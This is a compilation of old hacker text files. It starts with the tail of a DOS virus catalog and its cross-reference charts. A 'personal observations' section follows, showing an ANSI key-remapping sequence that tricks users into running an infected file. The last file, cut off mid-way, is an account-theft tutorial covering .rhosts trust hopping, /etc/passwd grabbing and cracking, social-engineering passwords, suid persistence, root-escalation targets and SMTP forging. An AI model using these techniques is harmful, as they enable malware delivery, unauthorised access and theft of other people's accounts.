infect an .EXE file in the current directory whenever an infected program is executed. If it is successful in locating an uninfected .EXE file, and infects it, Yankee Doodle will be played on the system speaker. Infected files will have the hex string '6D6F746865726675636B6572' at the end. The Yankee 2 Virus will not infect CodeView. Known variant(s) of the Yankee 2 virus are: 1624 - This variant is similar to Yankee 2 in function, the major change is that its effective length is 1,624 bytes. Virus Name: Yukon Overwriting Aliases: V Status: New Discovered: January, 1991 Symptoms: Divide Overflow errors; Beginning of Programs Overwritten Origin: Canada Eff Length: 151 Bytes Type Code: ONCK - Overwriting Non-Resident .COM Infector Detection Method: Removal Instructions: Delete infected files General Comments: The Yukon Overwriting Virus was isolated in January, 1991 in Canada. This virus is a non-resident overwriting virus that infects .COM files, including COMMAND.COM. When a program infected with the Yukon Overwriting Virus is executed, the virus will infect all .COM programs in the current directory. Infected programs will have the first 151 bytes of the program overwritten with the virus. Their date and time in the disk directory will not be altered in the process of infection. After infecting all of the .COM files in the current directory, the program the user was attempting to execute will fail with a Divide Overflow error. Infected programs can be easily identified because the text string Divide Overflow$ will be located beginning at offset 87h within the infected program. Programs infected with the Yukon Overwriting Virus cannot be disinfected as the portion overwritten by the virus is not stored. Infected programs must be deleted and replaced with uninfected copies. Virus Name: Zero Bug Aliases: Palette, 1536 V Status: Endangered Discovered: September, 1989 Symptoms: .COM growth (see text), TSR, graphics display Origin: Netherlands Eff Length: 1,536 bytes Type Code: PRsC - Parasitic Resident .COM Infector Detection Method: Viruscan/X V67+, F-Prot, Pro-Scan 1.4+, VirexPC, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: Scan/D/X, CleanUp V66+, F-Prot, Pro-Scan 1.4+, VirHunt 2.0+, or delete infected files General Comments: The Zero Bug virus was first isolated in the Netherlands by Jan Terpstra in September, 1989. This virus is a memory resident .COM file infector. Infected .COM files will increase in size by 1,536 bytes, however the increase in file length will not show up when the disk directory is displayed. The virus's main objective is to infect the copy of COMMAND.COM indicated by the environment variable COMSPEC. If COMSPEC doesn't point to anything, the Zero Bug virus will install itself memory resident using INT 21h. After the virus has either infected COMMAND.COM or become memory resident, it will infect all .COM files that are accessed, including those accessed by actions such as COPY or XCOPY. Any .COM file created on an infected system will also be infected. If the currently loaded COMMAND.COM is infected, the virus will hook into the timer interrupt 1Ch, and after a certain amount of time has past, a smiley face character (ASCII 01) will appear and eat all the zeros it can find on the screen. The virus does not delete files or format disks in its present form. Virus Name: ZeroHunt Aliases: Minnow, Stealth V Status: Research Discovered: December, 1990 Symptoms: Internal changes to COM files Origin: USA Eff Length: 416 Bytes Type Code: PRCK - Parasitic Overwriting .COM Infector Detection Method: Viruscan V72+, Pro-Scan 2.01+ Removal Instructions: Scan/D, Pro-Scan 2.01+, or Delete infected files General Comments: The ZeroHunt, or Minnow, Virus was submitted in December, 1990 by Paul Ferguson of Washington, DC. ZeroHunt is a memory resident overwriting infector of COM files, including COMMAND.COM. This virus is classified as a Stealth Virus. When the first program infected with the ZeroHunt Virus is executed, the virus will install itself memory resident in the command environment area. It occupies approximately 200 bytes of memory and hooks a number of interrupts, including interrupt 21 by remapping. Once ZeroHunt is memory resident, it waits for a COM file to be openned or executed which contains 416 or more bytes of 00h characters. These characters usually are stack space in the file, and most commonly occur in EXE files which have been converted to COM files. If the candidate COM file contains enough 00h characters, ZeroHunt will infect the file by writing its viral code over the first 416 bytes of the 00h characters. ZeroHunt then alters the first four bytes of the newly infected file so that upon execution its viral code will execute first. Like other Stealth class viruses, ZeroHunt will disinfect the file on the fly, so that the virus cannot be detected in files if it is memory resident. Since infected files have been infected internally by over- writing stack space, there will be no change in infected file length. ZeroHunt carries no activation criteria at the present time, it just replicates. ?????????????????????????????????????????????????????????????????????????????? PART III. Virus Common Name Cross-Reference The following is a cross-reference of common virus names back to the name they are listed by in the virus information section. Virus Name Refer To Virus(es) In Part II ?????????????????????? ???????????????????????????????????????????? @ Virus Turbo 448 62-B Vienna 100 Years Virus 4096 163 COM Virus Tiny Virus 217 Polish 217 333 Kennedy 382 382 Recovery Virus 382 Recovery Virus 382 Recovery Virus 405 405 437 VFSI 453 RPVS 500 Virus Golden Gate 505 Burger 509 Burger 512 512 512-A 512 512-B 512 512-C 512 512-D 512 512 Virus Friday The 13th COM Virus 529 Polish 529 541 Burger 623 VHP2 632 Saratoga 637 Vcomm 642 Icelandic 646 646 648 Vienna 765 Perfume 867 Typo COM 903 903 944 Dot Killer 1008 1008 1022 Fellowship 1024-B Nomenklatura 1168 Datacrime-B 1210 1210 1226 1226 1226D 1226D 1226M 1226D 1253 1253 1260 1260 1280 Datacrime 1374 Little Pieces 1381 Virus 1381 Virus 1392 1392 1514 Datacrime II 1536 Zero Bug 1539 Christmas Virus 1554 1554 1559 1554 1575 1575 1575-B 1575 1577 1575 1591 1575 1605 1605 1624 Yankee 2 1701 Cascade 1704 Cascade, Cascade-B 1704 Format 1704 Format 1704-B Cascade B 1720 1720 17Y4 Cascade 1808 Jerusalem 1813 Jerusalem 1917 Datacrime IIB 1961 Yankee 2 1971 Eight Tunes 2080 Fu Manchu 2086 Fu Manchu 2100 V2100 2131 2131 2576 Taiwan 4 2930 Traceback II 2930-B Traceback II 3012 Plastique 3066 Traceback 3066-B Traceback 3066-B2 Traceback 3551 SysLock 3555 SysLock 3880 Itavir 4096 4096 4096-B 4096 4096-C 4096 4711 Perfume 4870 Overwriting 4870 Overwriting 5120 5120 8920 Print Screen 909090h Virus Burger 9800:0000 Virus 1554 A-204 Jerusalem B Advent Syslock AIDS AIDS AIDS II AIDS II AirCop AirCop Akuku Akuku Alabama Alabama Alameda Alameda Ambulance Car Ambulance Car Amoeba Virus 1392 Amstrad Amstrad Anarkia Jerusalem B Anarkia-B Jerusalem B Anthrax Anthrax AntiCad 1253 Anti-Pascal Anti-Pascal Anti-Pascal 400 Anti-Pascal II Anti-Pascal 440 Anti-Pascal II Anti-Pascal 480 Anti-Pascal II Anti-Pascal 529 Anti-Pascal Anti-Pascal 605 Anti-Pascal Anti-Pascal II Anti-Pascal II AP-400 Anti-Pascal II AP-440 Anti-Pascal II AP-480 Anti-Pascal II AP-529 Anti-Pascal AP-605 Anti-Pascal April 1st Suriv 1.01 April 1st-B Suriv 2.01 Arab Star Jerusalem B Armagedon Armagedon Armagedon The First Armagedon Armagedon The Greek Armagedon Ashar Ashar Attention! Attention! Austrian Vienna Basic Virus 5120 Best Wish Best Wishes Best Wishes Best Wishes Best Wishes B Best Wishes Black Avenger Dark Avenger Black Friday Jerusalem Black Monday Black Monday Blackjack Cascade-B Blood Blood Blood 2 Blood Bloody! Bloody! Boot Ping Pong-B Bouncing Ball Ping Pong Bouncing Dot Ping Pong Brain Brain Burger Burger C-605 Anti-Pascal Carioca Carioca Cascade Cascade Cascade-B Cascade-B Casper Casper Century Virus 4096 Chaos Chaos Choinka Father Christmas Christmas In Japan Christmas In Japan Christmas Violator Violator B4 Christmas Virus Christmas Virus CIA Burger Columbus Day Datacrime, Datacrime II, Datacrime IIB, Datacrime-B COM Virus Friday The 13th COM Virus Computer Ogre Disk Killer Cookie Cookie Cunning Cascade Cursy Cursy Dark Avenger Dark Avenger Dark Avenger-B Dark Avenger Dark Avenger II V2000 Dark Avenger III V1024 Datacrime Datacrime Datacrime II Datacrime II Datacrime IIB Datacrime IIB Datacrime-B Datacrime-B DataLock DataLock DataLock 1.00 DataLock DBase DBase DBF Virus DBase Dead Kennedy Kennedy Death To Pascal Wisconsin December 24th Icelandic-III Den Zuk Den Zuk Destructor Destructor V4.00 Destructor V4.00 Destructor V4.00 Devil's Dance Devil's Dance Diana Dark Avenger Die Young Virus V2000 Dir Virus Dir Virus Discom Discom Disk Crunching Virus Icelandic, Saratoga Disk Killer Disk Killer Disk Ogre Disk Killer Do-Nothing Virus Do-Nothing Virus Donald Duck Stoned DOS-62 Vienna DOS-68 Vienna Durban Saturday The 14TH Dyslexia Solano 2000 Dyslexia 2.00 Solano 2000 Dyslexia 2.01 Solano 2000 EB 21 Print Screen Eddie Dark Avenger Eddie Virus Dark Avenger Eddie 3 V651 EDV EDV Eight Tunes Eight Tunes European Fish Viruses Fish Virus Evil Evil Evil-B Evil F-Word Virus F-Word Virus Fall Cascade Falling Letters Cascade, Ping Pong-B Falling Letters Boot Swap Boot Father Christmas Father Christmas Fellowship Fellowship Fish 6 Fish Virus Fish Virus Fish Virus Five O'Clock Virus Yankee Doodle Flash Flash Flip Flip Flip B Flip Form FORM-Virus Form Boot FORM-Virus FORM-Virus FORM-Virus Frere Virus Frere Jacques Frere Jacques Frere Jacques Friday 13th Jerusalem Friday 13th COM Virus Friday The 13th COM Virus Friday 13th-B Friday The 13th COM Virus Friday 13th-C Friday The 13th COM Virus FroDo 4096 Fu Manchu Fu Manchu Fuck You F-Word Fumble Typo COM G-Virus V1.3 Sorry Ghost Boot Ghostballs Ghost COM Ghostballs Ghostballs Ghostballs Golden Gate Golden Gate Grither Grither Green Left Virus Groen Links Groen Links Groen Links Guppy Guppy Hahaha AIDS Halloechen Halloechen Happy Birthday Joshi Joshi Happy N.Y. Happy New Year, Happy New Year B Happy New Year Happy New Year Happy New Year Happy New Year B Hawaii Stoned Hebrew University Jerusalem B Hemp Virus Stoned HM2 Plastique Holland Girl Holland Girl Holland Girl 2 Holland Girl 2 Holo Holocaust Holocaust Holocaust Hybrid Hybryd Hybryd Hybryd Hymn Hymn Icelandic Icelandic Icelandic-II Icelandic-II Icelandic-III Icelandic-III Ick IKV 528 IDF Virus 4096 IKV 528 IKV 528 Invader Invader Iraqui Iraqui Warrior Iraqui Warrior Iraqui Warrior Israeli Jerusalem, Suriv 1.01, Suriv 2.01, Suriv 3.00 Israeli Boot Swap Italian Ping Pong Itavir Itavir Jeff Jeff Jerusalem Jerusalem Jerusalem A Jerusalem Jerusalem B Jerusalem B Jerusalem C Jerusalem B Jerusalem D Jerusalem B Jerusalem DC Jerusalem B Jerusalem E Jerusalem B Jerusalem E2 Jerusalem B Jocker Joker JoJo JoJo JoJo 2 JoJo 2 Joker Joker Joshi Joshi July 13TH July 13TH June 16TH June 16TH Kamikazi Kamikazi Kemerovo Kemerovo Kennedy Kennedy Keypress Keypress Korea Korea Kukac Turbo Kukac LBC Boot Korea Leapfrog USSR 516 Lehigh Lehigh Lehigh University Lehigh Lehigh-2 Lehigh Lehigh-B Lehigh Leprosy Leprosy Leprosy 1.00 Leprosy Leprosy-B Leprosy Leprosy-C Leprosy Liberty Liberty Liberty-B Liberty Liberty-C Liberty Lisbon Lisbon Little Pieces Little Pieces Live after Death Virus V800 Lozinsky Lozinsky Mardi Bros Mardi Bros Marijuana Stoned Mazatlan Golden Gate Merritt Alameda Mendoza Jerusalem B Mexican Devil's Dance MG MG MG-2 MG-2 MG-3 MG-2 MGTU MGTU Miami Friday The 13th Microbes Microbes Minnow ZeroHunt Mirror Mirror Mistake Typo Boot MIX1 MIX1 MIX/1 MIX1 Mix1 MIX1 Monxla Monxla Monxla B Monxla B Mother Fish Whale Munich Friday The 13th COM Virus Murphy Murphy Murphy-1 Murphy Murphy-2 Murphy Music Boot MusicBug Music Bug MusicBug Music Virus Oropax MusicBug MusicBug Musician Oropax New Jerusalem New Jerusalem New Zealand Stoned News Flash Leprosy Nina Nina Nomenclature Nomenklatura Nomenklatura Nomenklatura Number 1 Number One Number of the Beast 512 Virus Number One Number One Ogre Disk Killer Ohio Ohio One In Eight Vienna One In Ten Icelandic, Icelandic-II One In Two Saratoga Ontario Ontario Oropax Oropax Oulu 1008 P1 Evil, Phoenix, PhoenixD, Proud Pakistani Brain Pakistani Brain Brain Palette Zero Bug Paris Paris Parity Parity Park ESS Jerusalem B Payday Payday Peking Alameda Pentagon Pentagon Perfume Perfume Phoenix Phoenix PhoenixD PhoenixD Ping Pong Ping Pong Ping Pong-B Ping Pong-B Ping Pong-C Ping Pong-C Pixel Amstrad Plastique Plastique Plastique 1 Plastique Plastique 2 Plastique-B Plastique 4.51 Plastique Plastique 5.21 Plastique-B Plastique Boot Invader Plastique-B Plastique-B PLO Jerusalem Point Killer Dot Killer Polimer Polimer Polimer Tapeworm Polimer Polish 217 Polish 217 Polish 217 B Polish 217 Polish 529 Polish 529 Polish 583 Polish 583 Polish 961 Stone`90 Polish Stupid Polish 217 Polish-2 Turbo 448, Turbo Kukac Pretoria June 16TH Print Screen Print Screen Print Screen-2 Print Screen Proud Proud PRTSC Virus Print Screen Prudents Virus 1210 PSQR Virus 1720 Puerto Jerusalem B Rape-11 Rape-11 Red Diavolyata Red Diavolyata RedX Ambulance Car Rostov Stoned RPVS RPVS RPVS-B RPVS Russian Jerusalem Saddam Saddam San Diego Stoned Saturday The 14th Saturday The 14th Saratoga Saratoga Saratoga 2 Icelandic Scott's Valley Scott's Valley Seoul Alameda Sentinel Sentinel Sex Revolution v1.1 Stoned Sex Revolution v2.0 Stoned SF Virus SF Virus Shake Virus Shake Virus Shoe_Virus Ashar Shoe_Virus-B Ashar-B Skism-1 Jerusalem B Slow Slow Slowdown Slow Smithsonian Stoned Solano 2000 Solano 2000 Sorry Sorry South African Friday The 13th COM Virus Spyer Spyer Stealth Viruses EDV, Fish, Holocaust, Joshi, Murphy, V651, V800, V1024, V2000, V2100, ZeroHunt, 512, 4096 Stone`90 Stone`90 Stone-90 Stone`90 Stoned Stoned Stoned II Stoned Stoned-B Stoned Stoned-C Stoned Stoned-D Stoned Stoned-E Stoned Stoned-F Stoned Stupid Virus Do-Nothing Subliminal 1.10 Subliminal 1.10 Sunday Sunday Sunday-B Sunday Sunday-C Sunday Suomi 1008 Suriv 1.01 Suriv 1.01 Suriv 2.01 Suriv 2.01 Suriv 3.00 Suriv 3.00 Suriv A Suriv 1.01, Suriv 2.01 Suriv B Suriv 3.00 Suriv01 Suriv 1.01 Suriv02 Suriv 2.01 Suriv03 Suriv 3.00 SVC V4.00 USSR 1689 Sverdlov Sverdlov SVir SVir SVir-A SVir SVir-B SVir Swap Swap Swedish Disaster Swedish Disaster Swiss 143 Swiss 143 Sylvia Holland Girl Sylvia 2 Holland Girl 2 SysLock Syslock System Virus Icelandic-II Taiwan Taiwan Taiwan 2 Taiwan Taiwan 3 Taiwan 3 Taiwan 4 Taiwan 4 Taiwan-B Taiwan Tannenbaum Christmas Virus Taunt AIDS Ten Bytes 1554 The Plague The Plague Time Monxla Time B Monxla B Tiny Family Tiny Family Tiny Virus Tiny Virus Tiny 134 Virus Tiny Family Tiny 138 Virus Tiny Family Tiny 143 Virus Tiny Family Tiny 154 Virus Tiny Family Tiny 156 Virus Tiny Family Tiny 158 Virus Tiny Family Tiny 159 Virus Tiny Family Tiny 160 Virus Tiny Family Tiny 163 Virus Tiny Virus Tiny 169 Virus Tiny Family Tiny 198 Virus Tiny Family Toothless Virus W13 TP04VIR Virus Vacsina TP05VIR Virus Vacsina TP06VIR Virus Vacsina TP16VIR Virus Vacsina TP23VIR Virus Vacsina TP24VIR Virus Vacsina TP25VIR Virus Vacsina TP33VIR Virus Yankee Doodle TP34VIR Virus Yankee Doodle TP38VIR Virus Yankee Doodle TP41VIR Virus Yankee Doodle TP42VIR Virus Yankee Doodle TP44VIR Virus Yankee Doodle TP45VIR Virus Yankee Doodle TP46VIR Virus Yankee Doodle Traceback Traceback Traceback II Traceback II Traceback II-B Traceback II Traceback-B Traceback Traceback-B2 Traceback Travel Virus V2000 Turbo @ Turbo 448 Turbo 448 Turbo 448 Turbo Kukac Turbo Kukac Turbo Kukac 9.9 Turbo Kukac Typo Boot Typo Boot Typo COM Typo COM UIUC Virus Ashar UIUC Virus-B Ashar Unesco Vienna UScan Virus V2100 USSR USSR USSR 257 Kemerovo USSR 311 USSR 311 USSR 394 Attention! USSR 492 USSR 492 USSR 516 USSR 516 USSR 600 USSR 600 USSR 707 USSR 707 USSR 711 USSR 711 USSR 830 Red Diavolyata USSR 948 USSR 948 USSR 1049 USSR 1049 USSR 1689 USSR 1689 USSR 2144 USSR 2144 V-1 1253 V-277 Amstrad V-299 Amstrad V-311 USSR 311 V-345 Amstrad V-847 Amstrad V-847B Amstrad V-852 Amstrad V-Alert 1554 V605 Anti-Pascal V651 V651 V800 V800 V800M V800 V920 DataLock V1024 V1024 V1226 1226 V1226D 1226D V1226M 1226D V1277 Murphy V1302 Proud V1521 Murphy V1600 Happy New Year V1701New Evil V1701New-B Evil V2000 V2000 V2000-B V2000 V2100 V2100 V2P1 1260 V2P2 V2P2 V2P6 V2P6 V2P6Z V2P6Z Vacsina Vacsina VBasic Virus 5120 Vcomm Vcomm Vera Cruz Ping Pong VFSI VFSI VGA2CGA AIDS VHP VHP VHP2 VHP2 VHP-348 VHP VHP-353 VHP VHP-367 VHP VHP-435 VHP VHP-623 VHP2 VHP-627 VHP2 Victor Victor Vien6 Vienna Vienna Vienna Vienna C 646 Vienna-B Vienna Vienna-B 645 Vienna Violator Violator Violator B4 Violator B4 Violator Strain B Violator Violator Strain B4 Violator B4 VirDem VirDem VirDem 2 VirDem Virus-90 Virus-90 Virus-B Friday The 13th COM Virus Virus101 Virus101 Voronezh Voronezh Voronezh B Voronezh VP VP W13 W13 W13-A W13 W13-B W13 Westwood Westwood Whale Whale Wisconsin Wisconsin Wolfman Wolfman XA1 Christmas Tree Xmas In Japan Christmas In Japan Yale Alameda Yankee 2 Yankee 2 Yankee Doodle Yankee Doodle Yankee Virus Yankee 2 Yankee-go-Home Yankee 2 Yukon Overwriting Yukon Overwriting Z The Whale Whale Zero Bug Zero Bug ZeroHunt ZeroHunt ?????????????????????????????????????????????????????????????????????????????? PART IV. Virus Relationship Chart 512 Virus --> 512-B --> 512-C --> 512-D 1226 --> 1226M --> 1226D 4096 --> 4096-B --> 4096-C --> Fish --> Whale Alameda --> Alameda-2 --> Golden Gate --> Golden Gate-B --> Golden Gate-C --> SF Virus Anti-Pascal --> AP-529 --> AP-400 --> AP-440 --> AP-480 Note: AP-480, AP-440, and AP-400 are grouped together in the listing as Anti-Pascal II Blood --> Blood2 Brain --> Ashar --> Clone --> Chaos --> EDV Cascade/1701 --> 1701-B --> 1704 --> 1704 Format --> 1704-B --> 17Y4 --> Cunning Datacrime --> Datacrime-B --> Datacrime II --> Datacrime IIB Do-Nothing --> Saddam Fri 13th COM --> Fri 13th-B --> Fri 13th-C --> Virus-B Happy New Year --> Happy New Year B HM2 --: --> Plastique COBOL --> Plastique --> Plastique 4.21 --> Plastique 5.21 Jerusalem B --: : V Invader Holland Girl --> Holland Girl 2 Icelandic --> Saratoga --> Iceland II --> Icelandic III --> Dec 24th --> Mix1 --> Mix1-B JoJo --> JoJo 2 Kennedy --> Tiny 163 Leprosy --> Leprosy-B --> The Plague --> Leprosy-C MG --> MG-2 --> MG-3 Murphy-1 --> Murphy-2 Ohio --> Den Zuk Perfume --> Sorry Phoenix --> PhoenixD --> Evil-B --> Evil Ping Pong --> Ping Pong-B --> Ping Pong-C --> Big Italian --> Typo --> Print Screen --> Print Screen-2 --> Ghostballs Pixel --> Amstrad --> V-847B --> V-852 --> V-345 --> V-299 --> V-277 Polish 217 --> Polish 217 B Rape-11 --> Rape-11 Stoned --> Stoned-B --> Rostov --> Sex Revolution v1.1 --> Sex Revolution v2.0 --> Stoned-C --> Stoned-D --> Stoned-E --> Stoned-F --> Stoned II Suriv 3.00 --> Jerusalem --> Fu Manchu --> Taiwan 3 --> Jerusalem B --> New Jerusalem --> Payday --> Sunday --> Sunday-B --> Sunday-C --> Jerusalem C --> Jerusalem D --> Jerusalem E --> Jerusalem F (Spanish) --> 1720/PSQR --> 1210/Prudents --> Frere Jacques --> Anarkia --> Anarkia-B --> Slow --> Westwood --> 1605 --> Park ESS --> Skism-1 --> (also see HM2 above) --> Discom Syslock --> Macho --> Macho-B --> Advent --> Cookie Tiny-198 --> Tiny-167 --> Tiny-160 --> Tiny-159 --> Tiny-158 --> Tiny-156 --> Tiny-154 --> Tiny-143 --> Tiny-138 --> Tiny-134 --> Tiny-133 Note: The Tiny-nnn Viruses indicated above are grouped together in the listing as "Tiny Family". The Tiny-163 virus is not related to the above group of viruses. Traceback II --> Traceback --> Traceback-B --> Traceback-B2 --> Traceback II-B V1024 --> Dark Avenger --> V651 --> V800 --> V800M --> V2000 --> V2000-B --> V2100 Vienna --> Father Christmas --> Lisbon --> Ghostballs --> 1260 --> V2P2 --> Casper --> V2P6 --> V2P6Z --> W13/V-534 --> W13-B/V-507 --> Wien (Poland) --> Vien6 --> Vienna-B --> Vienna-B 645 --> Violator --> Violator B4 --> Grither --> VHP-348 --> VHP-353 --> VHP-367 --> VHP-435 --> VHP-623 --> VHP-627 --> Iraqui Warrior Note: VHP-348, VHP-353, VHP-367, and VHP-435 are listed as VHP. VHP-623 and VHP-627 are listed as VHP2. Virus-90 --> Virus101 ?????????????????????????????????????????????????????????????????????????????? PART V Personal Observations Section A: The All Powerful Ansi-Bomb ????????????????????????????????????? The ANSI bomb is one of the most elusive ways to introduce one of your nasty microorganisms to an unsuspecting system. It could be hidden in the comments or just renamed to a different file; but, by far, the most unre- lentful ways to infect a system is via the remapping of a keyboard. For instance, you have an infected file that you just renamed to README.COM. Now create a zip comment file that looks something like this: [65;82;69;65;68;77;69;46;67;79;77;13p Which traslates to this: 'A' remapped to 'README.COM'<enter> Basically, I just remapped ASCII character 65, the Uppercase 'A', to README.COM<enter>. Say la.... Make sure you put this character, before the '['. The reason why I didn't do it here is because I didn't want to remap YOUR 'A' key to 'README.COM'<enter> :) When the user hits the 'A' key instead of getting an 'A', he/she will get 'README.COM' followed by a <return>. Thus completing our objective of the execution of the infected COM file. The most effective way, would be to write your own virus, which would be undetectable, AND to remap all of the keys to execute README.COM. Now, all you have to do is create a ZIP file and add the ANSI bomb as a comment. NOTE: You have to be careful not to add it as an ASCII comment. Another way would be to conceal the ANSI-Bomb in a BBS.AD and just hope the user type it out. Well, man, have fun with this shit... I can be contacted on my board: STeALtH TeCHnOLoGiEs: 504-PRI-VATE NUP: PAKISTANI or on: PHORTRESS SYSTEMS IV: 602-PRI-VATE Cybernet504 - 1 : 504-272-1710 - Dr. C - ?????????????????????????????????????????????????????????????????????????????? EnD Of FiLE ?????????????????????????????????????????????????????????????????????????????? \| \| \|\| CRACKING INTERNET ACCOUNTS \|\| \|\| By: A. Uzziah \|\| \| \| Disclaimer: I am in no way responsible for destruction of property or destroyed lives, etc, consequential or inconsequential. This file is for informational purposes only. Know ye that account cracking or piracy is illegal. Background: The Internet (also called Inet) is a world-wide computer network. There are hundreds of thousands (literally) of university, government, research, commercial, and foreign computers accessible from the Internet. The Internet ties smaller networks like Bitnet, Sprintnet (used to be called Telenet), Tymnet, etc, together. That's why you can send mail to someone on a different network than you. To really get any use out of this, you need an account. An Internet account has nothing to do with money, it's just a login and a password to a machine, and a personal directory on that machine's hard disk. Your hard disk space is also called a disk quota, and ranges from zilch to unlimited, depending on the machine and your privileges. It'll usually run about 1 to 4 megs, but for instance I was once using an account with 154 megs free disk space. Accounts are given to university students (though it depends on your university and major), certain government employees, generally just people who work for companies that can afford it and have real business being on the Inet. Your average juvenile cyberpunk though has no legitimate reason to be using the Internet, and may find it difficult to acquire an account. This is a basic guide to account theft. BASIC COMMANDS Ok remember that Unix is case sensitive, so all commands must be typed in lower case. Also, directory structure is like that of DOS, but instead of the backlash (\), UNIX USES THE FRONTSLASH (/). It will consider \ a null character. Unix uses the * as a wildcard, but it differs from DOS. Take the DOS expression "com.". In Unix you would only need to type "com". Also, unix files can have any number of extensions ("this.is.a.legal.unix.file.name") COMMAND DESCRIPTION man [command] This is like a help feature. It stands for manual, and will call up detailed help for a particular command. ls List files. equivalent of 'dir'. Try "ls -l\|more" for a full listing with page pausing (\|more). cp [files] Copy. Works like the DOS command, but a destination must be specified. You can copy directories with cpdir. rm [files] Delete. mv [file/s] [dest] Moves files. You can also mv directories with the mvdir command. cd Change directory. Just like DOS. finger See who's logged into the machine. cat Equivalent to the "type" command. telnet [sitename] Lets you remotely log into a site. rlogin [sitename] Like telnet, but has some different options. df Disk free shows space remaining for your disk block. mail Check mail. This isn't really designed as a Unix tutorial; for more detailed information you should spend some time playing with the man feature and the OS or get a book. ADDRESSES AND ACCOUNT NAMES Every site on the internet has an address and an IP number unique to it. An address is something like "lemcon1.yuz.uchicago.edu" and an IP number is a number like "129.57.5.78". Some systems will only accept the IP number as a mailing address or telnet destination. A mailing address is a login and a site--"login@the.site.name". PROCEDURE 1. You first need access to the Internet. This can come from existing accounts, a dial-in, or a machine that you can call. If you can borrow/steal/use an existing account, it may be possible to go directly to the lab or wherever your account is and use a terminal. Or you call a dial-in and from there connect to the site you wish to use. Sometimes a specific machine will have a dial-in that you can call, which will connect you directly to that machine. To get an existing account, bug a friend of yours who's in college. A lot of computer science people are actually pretty ignorant, and don't know that they use Internet. Just ask if they are using some kind of university network or something. If they say that they do use one, they probably have an account on the Internet. Then just go to the lab and use a terminal. To find out a dial-in number, call the college and ask if they have a computer network and how to access it. Try not to sound like a freak. If you dial directly to a machine, you will usually only be able to use that machine, but sometimes you can enter "telnet" or "rlogin" at the login prompt and connect to other sites. 2. After you've figured out how to access Inet services, you generally need an account to generate more accounts (there are other ways which I will go into later). To use an account you need a login and a password. In the above example my address was "[email protected]". After connecting to my local network I might type (the exact commands vary): gerber.UCLM.edu [that's the site i want to connect to] [Here i would see a unix version number and some maybe some other garbage, then i would see..] login: [i type "dementia"] password: [and of course i would type a password.] From there I might be asked to select a terminal type or something else trivial, but for all purposes I would be in the account. 3. The first order of business is to check and make sure the legitimate user who's account you're using isn't already logged in. Type "finger". You should get a list of users, and if the login you are using shows up more than once, hang up quick. But if the account has been idle for several hours, then the user is probably gone off and left processes running, and if you work quickly you may be able to get out before they get back. 4. Once you have gotten comfortable with the environment, check for an ".rhosts" file ("cat .rhosts"). This is a hidden file in the user's directory that will allow other users in a different account to log in--without the password. The .rhosts file is laid out like this-- [this is [email protected]'s .rhost file] hardy.u.washington.edu buddy genera.bleh.UCM.edu loser jizzrea.insanus.mceg.com fryme \_____________/ \| \| \| \ \ sitename login Ok, example time. I am using [email protected]'s account. The above .rhosts file is on [email protected]. From buddy's account I would type "rlogin bleys.gm.org -l sangeat" Sangeat's computer knows when I try to connect that my login is buddy, and since buddy is in the .rhosts, I connect. The exact commands vary because there are scads of Unix variants. The uses of an .rhosts file a obvious. Say you want to trade files with someone, but don't want to give them your password, or you just stuck your friend in so that he could use your account, etc. Think about this for a second though. If sangeat puts buddy in his .rhosts, then buddy might have put sangeat in his. So, when you get a new account, check the .rhosts file and try to connect to everyone in the local file, because if they're your's, there's a good chance that you're in theirs. If you get into one of those remote accounts, then check the remote account's .rhosts, and repeat the process... Be sure and grab the /etc/passwd file on all the machines that you happen to get into. 5. Check the mail, and read the mbox and dead.letter files. Find out who your victims friends are and try logging into their accounts. If you judge that your victim is friendly enough with someone, you can try mailing the someone and asking for a passwd so that you can "give them a file". 6. There is a chance that you will be caught. Often, you will be locked out but your account will remain. In other words, your files will be still be there, but your login will be refused. You can still get your files if you took have a second account on that machine and set up a suid system BEFORE HAND. Here is how a suid system works. When you create, mv, or cp a file, you become the owner of that file. Under normal circumstances, you are the only person (or anyone using your account!) that can delete or view these files because your user ID is unique. But, say you wanted grinch to be able to view a certain file named GLOTA.TXT. If you had write permission to their directory, you could copy /bin/cat to their directory and type "chmod a+s ~grinch/priv.cat". The file would still show up as being owned by you, and when executed, the user who executed would temporarily assume your ID (that's what the chmod a+s does). Grinch would type "priv.cat ~[your login]/GLOTA.TXT". This will work with any command. You could do this with the move command, and place suid mvs in two different accounts so that if one went down you could get the files from the other. If you don't understand, don't worry about it. Incidentally, if you are trying to hack root priveleges, here's a list of default suid files for System V which you can check for writeability. /bin/su /bin/df /bin/newgrp /bin/passwd /usr/bin/ct /usr/bin/cu /usr/bin/disable /usr/bin/enable /usr/bin/login /usr/bin/lpstat /usr/bin/shl /usr/bin/uucp /usr/bin/uuname /usr/bin/uustat /usr/bin/uux /usr/bin/mailq /usr/lib/accept /usr/lib/acct/accton /usr/lib/lpadin /usr/lib/lpmove /usr/lib/lpsched /usr/lib/lpshut /usr/lib/reject /usr/lib/sa/sadc /usr/lib/uucp/uccico /usr/lib/uucp/uusched /usr/lib/uucp/uuxqt 7. Check to see if any of your accounts support the "setname" command. This lets you change your login. This in conjunction with the chfn command will give you an almost entirely new identity. Your User ID is the only thing you can't change. If you do use setname, you may be unable to rlogin through .rhosts any longer, and mail will not be forwarded. If the account has not been used for sometime, it would probably be best for you to change your login. It really sucks when you are using someone's account and you're paged by one of their friends. If someone is still using it and you change the login, when the real user is unable to login, they are going to call the sys-admin. /ETC/PASSWD The /etc/passwd file is a file that every unix machine has. This file contains all information about of the user, including password. The file is readable by anyone, but the password is encrypted. Passwords are encrypted using DES standard. The encryption is unbreakable, but you can get dirty little programs to get around that. It works like this: In a passwd file of say, 500 users, there will be some people with simple passwords. Of course, you're not going to go through guessing passwords, your program does that for you. What the program does is it takes a list of words, maybe 200, which are commonly used as passwords. It then encrypts a word off the list, using the DES encryption standard, and checks to see if the ENCRYPTIONS match. If the encryptions match, then the words are obviously the same. You will snag only those accounts which are poorly protected. Natural selection. Occasionally you will run into a shadowed password file. Where the encrypted password normally resides will be an ''. The passwords are stored in a different, unreadable (to you at least) file. You can't crack these. Ain't no justice. You can get passwd crackers from any good BBS or just off sites on the Internet (paradoxical isn't it?). If you don't want anyone to crack your password you throw in a bunch of capitals in the middle of the word, or numbers, etc. PLAYING WITH THE MAILER This is one of my favorite tricks for some reason. When mail is sent, the mail program connects to port number 25 of a system and delivers the message. What's really neat is that you can do this too. Here's how it works.. Your target is [email protected].please. First you telnet to port number 25 of the site with the command "telnet crack.me.please 25". You will get a brief message. Type "HELO crack.me.please". The remote site should respond. Then type "MAIL FROM: [email protected].please" You should get an OK. Next type "MAIL TO: [email protected].please" Again, you should get an 